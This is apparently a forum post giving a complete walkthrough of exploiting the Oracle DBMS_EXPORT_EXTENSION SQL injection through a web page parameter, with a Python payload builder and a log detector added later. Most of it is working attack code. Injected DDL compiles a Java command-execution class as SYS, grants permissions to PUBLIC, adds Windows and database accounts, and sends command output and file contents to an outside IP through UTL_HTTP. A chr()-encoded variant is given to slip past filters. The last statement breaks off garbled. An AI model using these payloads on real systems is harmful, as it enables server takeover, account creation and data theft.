A worked demonstration: from Oracle injection to a cmdshell, start to finish

Posted 2012-12-18 12:21:48 by the thread starter
All of the demonstrations below were run in a web-based SQL*Plus. For web injection, turn select SYS.DBMS_EXPORT_EXTENSION..... into

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

and it works. (The 'a'|| is there so that the condition evaluates to true.)
The statement is fairly long, so it may have to be submitted via POST.
Two caveats before starting: this only works against a database that has not applied Oracle's April 2006 Critical Patch Update, which fixed the SQL injection in DBMS_EXPORT_EXTENSION; and the :P1 bind placeholder in DBMS_OUTPUT".PUT(:P1) must stay exactly as written, because it consumes the bind variable the vulnerable procedure passes into its dynamic statement (the chr()-encoded variant near the end of this post decodes to the same :P1).
The steps are as follows:
1. Create the package
By injecting into the SYS.DBMS_EXPORT_EXTENSION function, create a Java class LinxUtil on the Oracle server with two methods: runCMD, which executes system commands, and readFile, which reads files. Because DBMS_EXPORT_EXTENSION is a definer-rights package owned by SYS, the injected DDL runs as SYS and the objects land in the SYS schema, which is why they are called as sys.LinxRunCMD later on:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
If the URL length is limited, the readFile() block can be dropped, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
and likewise drop the statements in the later steps that deal with readFile().
------------------------------
2. Grant Java permissions
(This grant covers only the execute action, which is what Runtime.exec() needs. If LinxReadFile later returns a java.security.AccessControlException instead of file contents, grant the read action the same way.)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. Create the functions (PL/SQL call specifications for the two Java methods)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant PUBLIC the right to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
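Steps 1 to 4 are all the same statement with a different innermost DDL, and the only part that is easy to get wrong is the quote doubling at each EXECUTE IMMEDIATE layer. The Python builder below is an added example, not code from the original post: it produces the statements used above from a plain DDL string and wraps them in the '1'<>'a'||(...) form. The index name FOO, index schema BAR, type schema SYS and the request path /xxx.jsp are taken from the post; the helper names and the use of urllib for URL encoding are my own choices.

```python
"""Builder for the DBMS_EXPORT_EXTENSION injection statements used in steps 1-4.

Added example, not code from the original post. Each EXECUTE IMMEDIATE layer
is one more string literal, so a quote in the innermost DDL is doubled once per
layer: ' -> '' -> '''' -> ''''''''. Building the literals from the inside out
with one helper gets the count right automatically.
"""
import re
from urllib.parse import quote

# Dummy identifier arguments as used in the post; their values are arbitrary.
INDEX_NAME, INDEX_SCHEMA, TYPE_SCHEMA = "FOO", "BAR", "SYS"


def lit(s: str) -> str:
    """Wrap s as an Oracle single-quoted literal, doubling embedded quotes."""
    return "'" + s.replace("'", "''") + "'"


def type_name_payload(ddl: str) -> str:
    """Value of the injected TYPE_NAME argument.

    The vulnerable procedure concatenates "<schema>"."<type_name>" into dynamic
    PL/SQL, so the leading double quote closes its quoted identifier,
    DBMS_OUTPUT.PUT(:P1) consumes the bind variable it passes, the autonomous
    transaction lets DDL run inside a SELECT, and the trailing -- comments out
    the remainder of the procedure's own statement.
    """
    block = ("DECLARE PRAGMA AUTONOMOUS_TRANSACTION;"
             "BEGIN EXECUTE IMMEDIATE " + lit(ddl) + ";END;")
    return 'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ' + lit(block) + ";END;--"


def build_sql(ddl: str) -> str:
    """Complete SELECT as typed into SQL*Plus."""
    return ("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES("
            + lit(INDEX_NAME) + "," + lit(INDEX_SCHEMA) + ","
            + lit(type_name_payload(ddl)) + ","
            + lit(TYPE_SCHEMA) + ",0,'1',0) from dual")


def injected_param(ddl: str, base_value: str = "1") -> str:
    """Raw parameter value in the post's  and '1'<>'a'||(...)  form."""
    return base_value + " and '1'<>'a'||(" + build_sql(ddl) + ")"


def injected_url(ddl: str, page: str = "/xxx.jsp", param: str = "id") -> str:
    """URL-encoded GET request; long DDL (the Java source) needs POST instead."""
    return page + "?" + param + "=" + quote(injected_param(ddl), safe="")


def quote_depth(sql: str) -> int:
    """Longest run of consecutive single quotes, i.e. 2 ** nesting depth."""
    return max((len(m) for m in re.findall(r"'+", sql)), default=0)


# The post's step 3 DDL. The Java method name is itself a literal, so it ends
# up eight quotes deep in the finished statement; the trailing ; is part of
# the PL/SQL call specification.
STEP3_DDL = ("create or replace function LinxRunCMD(p_cmd in varchar2) "
             "return varchar2 as language java name "
             "'LinxUtil.runCMD(java.lang.String) return String';")

if __name__ == "__main__":
    print(build_sql("grant all on LinxRunCMD to public"))
    print(injected_url("drop function LinxRunCMD"))
    print("max quote run:", quote_depth(build_sql(STEP3_DDL)))
```

Running it reproduces the step 4 statement character for character and shows the eight-quote run around the Java method name in the step 3 statement; quote_depth() is a quick sanity check that a hand-edited payload has the right number of layers before it is sent.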
5. Test whether the steps above succeeded
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
(Use the second form. If the object is missing the subquery returns NULL, '1'<>NULL is not true and the page returns nothing; in the first form '11'||NULL is just '11', so the condition is true whether or not the object exists.)
6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)
Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>".
To see the output, use union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
or UTL_HTTP.request:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxReadFile:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)
Note: with UTL_HTTP.request, use REPLACE() to substitute the spaces and newlines, otherwise the HTTP request cannot be submitted. utl_encode.base64_encode also works. The newline has to be written as chr(10): Oracle string literals do not interpret backslash escapes, so '\n' would match the two characters backslash and n rather than the line feed that runCMD appends after each line of output. On Oracle 11g and later, UTL_HTTP additionally requires a network ACL that allows the calling user to reach the target host, so a failure here may be the ACL rather than the encoding.
--------------------
7. Internal changes
The following query shows the changes in the all_objects view (the Java permission granted in step 2 is likewise visible in DBA_JAVA_POLICY):
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
8. Drop the functions we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
(This removes only LinxRunCMD. LinxReadFile, the LinxUtil Java source and the Java permission granted to PUBLIC in step 2 stay behind unless they are dropped or revoked the same way.)
====================================================
End of article. Dedicated to my friends.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test for the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
That is, the same statement with every string argument written as a chr() chain, so that no quote characters appear in the request (each chain decodes to the argument's value, with one level of quote doubling fewer than in the literal form above):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
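The chr() form above keeps quote characters out of the request, which defeats filters that look for them, but it is trivially reversible and the function name itself cannot be encoded. The detector below is an added example, not part of the original post: it URL-decodes the request line of an access-log entry, collapses chr(n)||chr(n)... chains back to the text they encode, and flags the indicators of this technique. The log lines are constructed for the example (the 10.0.0.x addresses and timestamps are invented); the indicator list and the threshold of four chr() calls are my own assumptions.

```python
"""Decoder and access-log detector for the chr()-encoded DBMS_EXPORT_EXTENSION injection.

Added example, not code from the original post. The chr() chain hides quotes and
keywords from naive filters, but it is a fixed, reversible transform, and the
package name in the SELECT has to stay in clear text.
"""
import re
from urllib.parse import unquote_plus

CHR_ONE = re.compile(r"chr\((\d+)\)", re.I)
CHR_CHAIN = re.compile(r"chr\(\d+\)(?:\s*\|\|\s*chr\(\d+\))*", re.I)

# Substrings treated as indicators of this technique (my choice, not the post's).
INDICATORS = (
    "DBMS_EXPORT_EXTENSION", "GET_DOMAIN_INDEX_TABLES", "EXECUTE IMMEDIATE",
    "COMPILE JAVA SOURCE", "DBMS_JAVA.GRANT_PERMISSION", "UTL_HTTP.REQUEST",
    "CREATE USER", "GRANT DBA",
)
MIN_CHR_CALLS = 4   # assumed threshold: shorter chains occur in legitimate SQL

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')


def chr_encode(s: str) -> str:
    """Oracle chr() chain for s, the way the post writes the encoded statement."""
    return "||".join(f"chr({ord(c)})" for c in s)


def decode_chr_chains(s: str) -> str:
    """Replace every chr(n)||chr(n)... chain in s with the text it encodes."""
    return CHR_CHAIN.sub(
        lambda m: "".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0))), s)


def analyse_request(log_line: str):
    """Return {path, hits, decoded} for one access-log line, or None if no request."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    raw = unquote_plus(m.group(1))          # undo %xx and + before looking at SQL
    decoded = decode_chr_chains(raw)        # then undo the chr() obfuscation
    upper = decoded.upper()
    hits = [k for k in INDICATORS if k in upper]
    if len(CHR_ONE.findall(raw)) >= MIN_CHR_CALLS:
        hits.append("chr()-chain")
    return {"path": m.group(1).split("?", 1)[0], "hits": hits, "decoded": decoded}


def scan(log_lines):
    """All requests carrying at least one indicator, in log order."""
    results = (analyse_request(line) for line in log_lines)
    return [r for r in results if r and r["hits"]]


# Constructed sample log: a benign request, the literal step 4 injection, and the
# chr()-encoded CREATE USER statement from the end of the post.
ENCODED_ARG = chr_encode(
    'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE \'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;'
    "BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--")
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Dec/2012:12:21:48 +0800] "GET /xxx.jsp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Dec/2012:12:22:03 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E%27a%27%7C%7C'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,'
    '%27DBMS_OUTPUT%22.PUT(:P1);EXECUTE%20IMMEDIATE%20%27%27DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;'
    'BEGIN%20EXECUTE%20IMMEDIATE%20%27%27%27%27grant%20all%20on%20LinxRunCMD%20to%20public%27%27%27%27;'
    'END;%27%27;END;--%27,%27SYS%27,0,%271%27,0)%20from%20dual) HTTP/1.1" 500 0',
    '10.0.0.9 - - [18/Dec/2012:12:25:41 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E('
    "select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),"
    "chr(66)||chr(65)||chr(82)," + ENCODED_ARG + ",chr(83)||chr(89)||chr(83),0,chr(49),0)"
    '%20from%20dual) HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["path"], r["hits"])
        print("   ", r["decoded"][:120])
```

The decoded text is worth keeping next to the alert: for the third line it is the CREATE USER statement the attacker actually ran, which is what an incident responder needs in order to know what to revert.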
Confirm the vulnerability exists:
1<>(
select user_id from all_users where username='LINXSQL'
)
Grant linxsql the CONNECT privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Delete the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The method below creates a function Linx_query() that can execute arbitrary statements, returning the number 1 on success. Because it is declared AUTHID CURRENT_USER its privileges are inherited from the caller, which may amount to nothing more than PUBLIC, so it seems of limited use; if you really need it, consider running grant dba to the current user first:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE